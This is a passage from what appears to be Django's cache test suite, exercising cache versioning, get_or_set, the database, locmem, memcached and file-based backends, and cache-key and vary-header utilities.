self.assertEqual(caches['v2'].get('answer3'), 42)
self.assertIsNone(caches['v2'].get('answer3', version=1))
self.assertEqual(caches['v2'].get('answer3', version=2), 42)
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set('answer4', 42, version=1)
self.assertEqual(cache.get('answer4'), 42)
self.assertEqual(cache.get('answer4', version=1), 42)
self.assertIsNone(cache.get('answer4', version=2))
self.assertIsNone(caches['v2'].get('answer4'))
self.assertEqual(caches['v2'].get('answer4', version=1), 42)
self.assertIsNone(caches['v2'].get('answer4', version=2))
def test_cache_versioning_add(self):
# add, default version = 1, but manually override version = 2
cache.add('answer1', 42, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=1)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
# v2 add, using default version = 2
caches['v2'].add('answer2', 42)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37, version=1)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
# v2 add, default version = 2, but manually override version = 1
caches['v2'].add('answer3', 42, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
cache.set('answer1', 42)
# has_key
self.assertTrue(cache.has_key('answer1'))
self.assertTrue(cache.has_key('answer1', version=1))
self.assertFalse(cache.has_key('answer1', version=2))
self.assertFalse(caches['v2'].has_key('answer1'))
self.assertTrue(caches['v2'].has_key('answer1', version=1))
self.assertFalse(caches['v2'].has_key('answer1', version=2))
def test_cache_versioning_delete(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.delete('answer1')
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.delete('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertIsNone(cache.get('answer2', version=2))
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].delete('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertIsNone(cache.get('answer3', version=2))
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].delete('answer4', version=1)
self.assertIsNone(cache.get('answer4', version=1))
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.incr('answer1')
self.assertEqual(cache.get('answer1', version=1), 38)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.decr('answer1')
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.incr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 43)
cache.decr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].incr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 43)
caches['v2'].decr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 42)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].incr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=2), 42)
caches['v2'].decr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
# set, using default version = 1
cache.set_many({'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1']), {'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})
# set, default version = 1, but manually override version = 2
cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
self.assertDictEqual(cache.get_many(['ford2', 'arthur2']), {})
self.assertDictEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
self.assertDictEqual(cache.get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2']), {'ford2': 37, 'arthur2': 42})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42})
# v2 set, using default version = 2
caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3']), {})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3']), {'ford3': 37, 'arthur3': 42})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42})
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
self.assertDictEqual(cache.get_many(['ford4', 'arthur4']), {'ford4': 37, 'arthur4': 42})
self.assertDictEqual(cache.get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42})
self.assertDictEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})
def test_incr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertIsNone(cache.get('answer', version=3))
self.assertEqual(cache.incr_version('answer', version=2), 3)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertIsNone(cache.get('answer', version=2))
self.assertEqual(cache.get('answer', version=3), 42)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertIsNone(caches['v2'].get('answer2', version=3))
self.assertEqual(caches['v2'].incr_version('answer2'), 3)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertEqual(caches['v2'].get('answer2', version=3), 42)
with self.assertRaises(ValueError):
cache.incr_version('does_not_exist')
def test_decr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.decr_version('answer', version=2), 1)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.get('answer', version=1), 42)
self.assertIsNone(cache.get('answer', version=2))
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].decr_version('answer2'), 1)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertEqual(caches['v2'].get('answer2', version=1), 42)
self.assertIsNone(caches['v2'].get('answer2', version=2))
with self.assertRaises(ValueError):
cache.decr_version('does_not_exist', version=2)
def test_custom_key_func(self):
# Two caches with different key functions aren't visible to each other
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertIsNone(caches['custom_key'].get('answer1'))
self.assertIsNone(caches['custom_key2'].get('answer1'))
caches['custom_key'].set('answer2', 42)
self.assertIsNone(cache.get('answer2'))
self.assertEqual(caches['custom_key'].get('answer2'), 42)
self.assertEqual(caches['custom_key2'].get('answer2'), 42)
def test_cache_write_unpicklable_object(self):
update_middleware = UpdateCacheMiddleware()
update_middleware.cache = cache
fetch_middleware = FetchFromCacheMiddleware()
fetch_middleware.cache = cache
request = self.factory.get('/cache/test')
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Testing cookie serialization.'
response.content = content
response.set_cookie('foo', 'bar')
update_middleware.process_response(request, response)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
update_middleware.process_response(request, get_cache_data)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
# Shouldn't fail silently if trying to cache an unpicklable type.
with self.assertRaises(pickle.PickleError):
cache.add('unpicklable', Unpicklable())
def test_set_fail_on_pickleerror(self):
with self.assertRaises(pickle.PickleError):
cache.set('unpicklable', Unpicklable())
def test_get_or_set(self):
self.assertIsNone(cache.get('projector'))
self.assertEqual(cache.get_or_set('projector', 42), 42)
self.assertEqual(cache.get('projector'), 42)
self.assertEqual(cache.get_or_set('null', None), None)
def test_get_or_set_callable(self):
def my_callable():
return 'value'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'value')
self.assertEqual(cache.get_or_set('mykey', my_callable()), 'value')
def test_get_or_set_version(self):
msg = (
"get_or_set() missing 1 required positional argument: 'default'"
if six.PY3
else 'get_or_set() takes at least 3 arguments'
)
cache.get_or_set('brian', 1979, version=2)
with self.assertRaisesMessage(TypeError, msg):
cache.get_or_set('brian')
with self.assertRaisesMessage(TypeError, msg):
cache.get_or_set('brian', version=1)
self.assertIsNone(cache.get('brian', version=1))
self.assertEqual(cache.get_or_set('brian', 42, version=1), 42)
self.assertEqual(cache.get_or_set('brian', 1979, version=2), 1979)
self.assertIsNone(cache.get('brian', version=3))
def test_get_or_set_racing(self):
with mock.patch('%s.%s' % (settings.CACHES['default']['BACKEND'], 'add')) as cache_add:
# Simulate cache.add() failing to add a value. In that case, the
# default value should be returned.
cache_add.return_value = False
self.assertEqual(cache.get_or_set('key', 'default'), 'default')
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Spaces are used in the table name to ensure quoting/escaping is working
LOCATION='test cache table'
))
class DBCacheTests(BaseCacheTests, TransactionTestCase):
available_apps = ['cache']
def setUp(self):
        # The super call needs to happen first for the settings override.
super(DBCacheTests, self).setUp()
self.create_table()
def tearDown(self):
# The super call needs to happen first because it uses the database.
super(DBCacheTests, self).tearDown()
self.drop_table()
def create_table(self):
management.call_command('createcachetable', verbosity=0, interactive=False)
def drop_table(self):
with connection.cursor() as cursor:
table_name = connection.ops.quote_name('test cache table')
cursor.execute('DROP TABLE %s' % table_name)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 18)
def test_second_call_doesnt_crash(self):
out = six.StringIO()
management.call_command('createcachetable', stdout=out)
self.assertEqual(out.getvalue(), "Cache table 'test cache table' already exists.\n" * len(settings.CACHES))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Use another table name to avoid the 'table already exists' message.
LOCATION='createcachetable_dry_run_mode'
))
def test_createcachetable_dry_run_mode(self):
out = six.StringIO()
management.call_command('createcachetable', dry_run=True, stdout=out)
output = out.getvalue()
self.assertTrue(output.startswith("CREATE TABLE"))
def test_createcachetable_with_table_argument(self):
"""
Delete and recreate cache table with legacy behavior (explicitly
specifying the table name).
"""
self.drop_table()
out = six.StringIO()
management.call_command(
'createcachetable',
'test cache table',
verbosity=2,
stdout=out,
)
self.assertEqual(out.getvalue(), "Cache table 'test cache table' created.\n")
@override_settings(USE_TZ=True)
class DBCacheWithTimeZoneTests(DBCacheTests):
pass
class DBCacheRouter(object):
"""A router that puts the cache table on the 'other' database."""
def db_for_read(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def db_for_write(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def allow_migrate(self, db, app_label, **hints):
if app_label == 'django_cache':
return db == 'other'
return None
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
},
},
)
class CreateCacheTableForDBCacheTests(TestCase):
multi_db = True
@override_settings(DATABASE_ROUTERS=[DBCacheRouter()])
def test_createcachetable_observes_database_router(self):
# cache table should not be created on 'default'
with self.assertNumQueries(0, using='default'):
management.call_command('createcachetable',
database='default',
verbosity=0, interactive=False)
# cache table should be created on 'other'
# Queries:
# 1: check table doesn't already exist
# 2: create savepoint (if transactional DDL is supported)
# 3: create the table
# 4: create the index
# 5: release savepoint (if transactional DDL is supported)
num = 5 if connections['other'].features.can_rollback_ddl else 3
with self.assertNumQueries(num, using='other'):
management.call_command('createcachetable',
database='other',
verbosity=0, interactive=False)
class PicklingSideEffect(object):
def __init__(self, cache):
self.cache = cache
self.locked = False
def __getstate__(self):
if self.cache._lock.active_writers:
self.locked = True
return {}
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
))
class LocMemCacheTests(BaseCacheTests, TestCase):
def setUp(self):
super(LocMemCacheTests, self).setUp()
# LocMem requires a hack to make the other caches
# share a data store with the 'normal' cache.
caches['prefix']._cache = cache._cache
caches['prefix']._expire_info = cache._expire_info
caches['v2']._cache = cache._cache
caches['v2']._expire_info = cache._expire_info
caches['custom_key']._cache = cache._cache
caches['custom_key']._expire_info = cache._expire_info
caches['custom_key2']._cache = cache._cache
caches['custom_key2']._expire_info = cache._expire_info
@override_settings(CACHES={
'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other'
},
})
def test_multiple_caches(self):
"Check that multiple locmem caches are isolated"
cache.set('value', 42)
self.assertEqual(caches['default'].get('value'), 42)
self.assertIsNone(caches['other'].get('value'))
def test_locking_on_pickle(self):
"""#20613/#18541 -- Ensures pickling is done outside of the lock."""
bad_obj = PicklingSideEffect(cache)
cache.set('set', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
cache.add('add', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
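# Informal note (not part of the original suite): if the locmem backend
# pickled the value while holding its write lock, an object whose
# __getstate__ touches the cache could observe the lock as held and, in the
# worst case, deadlock. PicklingSideEffect.__getstate__ above simply records
# whether any writer held the lock at pickling time, so the two assertions
# verify that set()/add() serialize the value before taking the lock.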
def test_incr_decr_timeout(self):
"""incr/decr does not modify expiry time (matches memcached behavior)"""
key = 'value'
_key = cache.make_key(key)
cache.set(key, 1, timeout=cache.default_timeout * 10)
expire = cache._expire_info[_key]
cache.incr(key)
self.assertEqual(expire, cache._expire_info[_key])
cache.decr(key)
self.assertEqual(expire, cache._expire_info[_key])
# memcached backend isn't guaranteed to be available.
# To check the memcached backend, the test settings file will
# need to contain at least one cache backend setting that points at
# your memcache server.
configured_caches = {}
for _cache_params in settings.CACHES.values():
configured_caches[_cache_params['BACKEND']] = _cache_params
MemcachedCache_params = configured_caches.get('django.core.cache.backends.memcached.MemcachedCache')
PyLibMCCache_params = configured_caches.get('django.core.cache.backends.memcached.PyLibMCCache')
# The memcached backends don't support cull-related options like `MAX_ENTRIES`.
memcached_excluded_caches = {'cull', 'zero_cull'}
class BaseMemcachedTests(BaseCacheTests):
# By default it's assumed that the client doesn't clean up connections
# properly, in which case the backend must do so after each request.
should_disconnect_on_close = True
def test_location_multiple_servers(self):
locations = [
['server1.tld', 'server2:11211'],
'server1.tld;server2:11211',
'server1.tld,server2:11211',
]
for location in locations:
params = {'BACKEND': self.base_params['BACKEND'], 'LOCATION': location}
with self.settings(CACHES={'default': params}):
self.assertEqual(cache._servers, ['server1.tld', 'server2:11211'])
def test_invalid_key_characters(self):
"""
On memcached, we don't introduce a duplicate key validation
step (for speed reasons); we just let the memcached API
library raise its own exception on bad keys. Refs #6447.
In order to be memcached-API-library agnostic, we only assert
that a generic exception of some kind is raised.
"""
# memcached does not allow whitespace or control characters in keys
# when using the ascii protocol.
with self.assertRaises(Exception):
cache.set('key with spaces', 'value')
def test_invalid_key_length(self):
# memcached limits key length to 250
with self.assertRaises(Exception):
cache.set('a' * 251, 'value')
def test_default_never_expiring_timeout(self):
# Regression test for #22845
with self.settings(CACHES=caches_setting_for_tests(
base=self.base_params,
exclude=memcached_excluded_caches,
TIMEOUT=None)):
cache.set('infinite_foo', 'bar')
self.assertEqual(cache.get('infinite_foo'), 'bar')
def test_default_far_future_timeout(self):
# Regression test for #22845
with self.settings(CACHES=caches_setting_for_tests(
base=self.base_params,
exclude=memcached_excluded_caches,
# 60*60*24*365, 1 year
TIMEOUT=31536000)):
cache.set('future_foo', 'bar')
self.assertEqual(cache.get('future_foo'), 'bar')
def test_cull(self):
# Culling isn't implemented; memcached deals with it.
pass
def test_zero_cull(self):
# Culling isn't implemented; memcached deals with it.
pass
def test_memcached_deletes_key_on_failed_set(self):
# By default memcached allows objects up to 1MB. For the cache_db session
# backend to always use the current session, memcached needs to delete
# the old key if it fails to set.
# pylibmc doesn't seem to have SERVER_MAX_VALUE_LENGTH as far as I can
# tell from a quick check of its source code. This is falling back to
# the default value exposed by python-memcached on my system.
max_value_length = getattr(cache._lib, 'SERVER_MAX_VALUE_LENGTH', 1048576)
cache.set('small_value', 'a')
self.assertEqual(cache.get('small_value'), 'a')
large_value = 'a' * (max_value_length + 1)
try:
cache.set('small_value', large_value)
except Exception:
# Some clients (e.g. pylibmc) raise when the value is too large,
# while others (e.g. python-memcached) intentionally return True
# indicating success. This test is primarily checking that the key
# was deleted, so the return/exception behavior for the set()
# itself is not important.
pass
# small_value should be deleted, or set if configured to accept larger values
value = cache.get('small_value')
self.assertTrue(value is None or value == large_value)
def test_close(self):
# For clients that don't manage their connections properly, the
# connection is closed when the request is complete.
signals.request_finished.disconnect(close_old_connections)
try:
with mock.patch.object(cache._lib.Client, 'disconnect_all', autospec=True) as mock_disconnect:
signals.request_finished.send(self.__class__)
self.assertIs(mock_disconnect.called, self.should_disconnect_on_close)
finally:
signals.request_finished.connect(close_old_connections)
@unittest.skipUnless(MemcachedCache_params, "MemcachedCache backend not configured")
@override_settings(CACHES=caches_setting_for_tests(
base=MemcachedCache_params,
exclude=memcached_excluded_caches,
))
class MemcachedCacheTests(BaseMemcachedTests, TestCase):
base_params = MemcachedCache_params
def test_memcached_uses_highest_pickle_version(self):
# Regression test for #19810
for cache_key in settings.CACHES:
self.assertEqual(caches[cache_key]._cache.pickleProtocol, pickle.HIGHEST_PROTOCOL)
@override_settings(CACHES=caches_setting_for_tests(
base=MemcachedCache_params,
exclude=memcached_excluded_caches,
OPTIONS={'server_max_value_length': 9999},
))
def test_memcached_options(self):
self.assertEqual(cache._cache.server_max_value_length, 9999)
@unittest.skipUnless(PyLibMCCache_params, "PyLibMCCache backend not configured")
@override_settings(CACHES=caches_setting_for_tests(
base=PyLibMCCache_params,
exclude=memcached_excluded_caches,
))
class PyLibMCCacheTests(BaseMemcachedTests, TestCase):
base_params = PyLibMCCache_params
# libmemcached manages its own connections.
should_disconnect_on_close = False
# By default, pylibmc/libmemcached don't verify keys client-side and so
# this test triggers a server-side bug that causes later tests to fail
# (#19914). The `verify_keys` behavior option could be set to True (which
# would avoid triggering the server-side bug), however this test would
# still fail due to https://github.com/lericson/pylibmc/issues/219.
@unittest.skip("triggers a memcached-server bug, causing subsequent tests to fail")
def test_invalid_key_characters(self):
pass
@override_settings(CACHES=caches_setting_for_tests(
base=PyLibMCCache_params,
exclude=memcached_excluded_caches,
OPTIONS={
'binary': True,
'behaviors': {'tcp_nodelay': True},
},
))
def test_pylibmc_options(self):
self.assertTrue(cache._cache.binary)
self.assertEqual(cache._cache.behaviors['tcp_nodelay'], int(True))
@override_settings(CACHES=caches_setting_for_tests(
base=PyLibMCCache_params,
exclude=memcached_excluded_caches,
OPTIONS={'tcp_nodelay': True},
))
def test_pylibmc_legacy_options(self):
deprecation_message = (
"Specifying pylibmc cache behaviors as a top-level property "
"within `OPTIONS` is deprecated. Move `tcp_nodelay` into a dict named "
"`behaviors` inside `OPTIONS` instead."
)
with warnings.catch_warnings(record=True) as warns:
warnings.simplefilter("always")
self.assertEqual(cache._cache.behaviors['tcp_nodelay'], int(True))
self.assertEqual(len(warns), 1)
self.assertIsInstance(warns[0].message, RemovedInDjango21Warning)
self.assertEqual(str(warns[0].message), deprecation_message)
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.filebased.FileBasedCache',
))
class FileBasedCacheTests(BaseCacheTests, TestCase):
"""
Specific test cases for the file-based cache.
"""
def setUp(self):
super(FileBasedCacheTests, self).setUp()
self.dirname = tempfile.mkdtemp()
# The cache LOCATION cannot be modified through override_settings / modify_settings,
# so the settings are manipulated directly here and the setting_changed signal
# is triggered manually.
for cache_params in settings.CACHES.values():
cache_params.update({'LOCATION': self.dirname})
setting_changed.send(self.__class__, setting='CACHES', enter=False)
def tearDown(self):
super(FileBasedCacheTests, self).tearDown()
# Call parent first, as cache.clear() may recreate cache base directory
shutil.rmtree(self.dirname)
def test_ignores_non_cache_files(self):
fname = os.path.join(self.dirname, 'not-a-cache-file')
with open(fname, 'w'):
os.utime(fname, None)
cache.clear()
self.assertTrue(os.path.exists(fname),
'Expected cache.clear to ignore non cache files')
os.remove(fname)
def test_clear_does_not_remove_cache_dir(self):
cache.clear()
self.assertTrue(os.path.exists(self.dirname),
'Expected cache.clear to keep the cache dir')
def test_creates_cache_dir_if_nonexistent(self):
os.rmdir(self.dirname)
cache.set('foo', 'bar')
self.assertTrue(os.path.exists(self.dirname))
def test_cache_write_unpicklable_type(self):
# This fails if not using the highest pickling protocol on Python 2.
cache.set('unpicklable', UnpicklableType())
def test_get_ignores_enoent(self):
cache.set('foo', 'bar')
os.unlink(cache._key_to_file('foo'))
# Returns the default instead of erroring.
self.assertEqual(cache.get('foo', 'baz'), 'baz')
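# Note (added for clarity; the exact layout is an implementation detail):
# the file-based backend maps each versioned cache key to a single file
# under LOCATION, roughly hashlib.md5(full_key).hexdigest() + '.djcache',
# which is what _key_to_file() returns above. Removing that file is
# therefore equivalent to the entry silently disappearing, and get() falls
# back to its default instead of raising.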
def test_get_does_not_ignore_non_enoent_errno_values(self):
with mock.patch.object(io, 'open', side_effect=IOError):
with self.assertRaises(IOError):
cache.get('foo')
@override_settings(CACHES={
'default': {
'BACKEND': 'cache.liberal_backend.CacheClass',
},
})
class CustomCacheKeyValidationTests(SimpleTestCase):
"""
Tests for the ability to mixin a custom ``validate_key`` method to
a custom cache backend that otherwise inherits from a builtin
backend, and override the default key validation. Refs #6447.
"""
def test_custom_key_validation(self):
# this key is both longer than 250 characters, and has spaces
key = 'some key with spaces' * 15
val = 'a value'
cache.set(key, val)
self.assertEqual(cache.get(key), val)
@override_settings(
CACHES={
'default': {
'BACKEND': 'cache.closeable_cache.CacheClass',
}
}
)
class CacheClosingTests(SimpleTestCase):
def test_close(self):
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
DEFAULT_MEMORY_CACHES_SETTINGS = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique-snowflake',
}
}
NEVER_EXPIRING_CACHES_SETTINGS = copy.deepcopy(DEFAULT_MEMORY_CACHES_SETTINGS)
NEVER_EXPIRING_CACHES_SETTINGS['default']['TIMEOUT'] = None
class DefaultNonExpiringCacheKeyTests(SimpleTestCase):
"""Tests that verify that settings having Cache arguments with a TIMEOUT
set to `None` will create Caches that will set non-expiring keys.
This fixes ticket #22085.
"""
def setUp(self):
# The 5 minute (300 seconds) default expiration time for keys is
# defined in the implementation of the initializer method of the
# BaseCache type.
self.DEFAULT_TIMEOUT = caches[DEFAULT_CACHE_ALIAS].default_timeout
def tearDown(self):
del self.DEFAULT_TIMEOUT
def test_default_expiration_time_for_keys_is_5_minutes(self):
"""The default expiration time of a cache key is 5 minutes.
This value is defined inside the __init__() method of the
:class:`django.core.cache.backends.base.BaseCache` type.
"""
self.assertEqual(300, self.DEFAULT_TIMEOUT)
def test_caches_with_unset_timeout_has_correct_default_timeout(self):
"""Caches that have the TIMEOUT parameter undefined in the default
settings will use the default 5 minute timeout.
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertEqual(self.DEFAULT_TIMEOUT, cache.default_timeout)
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_has_correct_default_timeout(self):
"""Memory caches that have the TIMEOUT parameter set to `None` in the
default settings will have `None` as the default timeout.
This means "no timeout".
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertIsNone(cache.default_timeout)
self.assertIsNone(cache.get_backend_timeout())
@override_settings(CACHES=DEFAULT_MEMORY_CACHES_SETTINGS)
def test_caches_with_unset_timeout_set_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter unset will set cache
keys having the default 5 minute timeout.
"""
key = "my-key"
value = "my-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNotNone(cache._expire_info[cache_key])
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_set_non_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter set to `None` will set
a non-expiring key by default.
"""
key = "another-key"
value = "another-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNone(cache._expire_info[cache_key])
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
ALLOWED_HOSTS=['.example.com'],
)
class CacheUtils(SimpleTestCase):
"""TestCase for django.utils.cache functions."""
def setUp(self):
self.host = 'www.example.com'
self.path = '/cache/test/'
self.factory = RequestFactory(HTTP_HOST=self.host)
def tearDown(self):
cache.clear()
def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
request = self._get_request(self.host, self.path,
method, query_string=query_string)
request._cache_update_cache = True if not update_cache else update_cache
return request
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
response = HttpResponse()
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
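# Summary of the behaviour the table above pins down (descriptive comment
# only): patch_vary_headers() merges header names case-insensitively,
# preserves the casing and order of names already present in Vary, and
# appends genuinely new names using the casing supplied by the caller,
# e.g. (None, ('Accept-Encoding', 'COOKIE')) -> 'Accept-Encoding, COOKIE'.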
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
key_prefix = 'localprefix'
learn_cache_key(request, response, key_prefix=key_prefix)
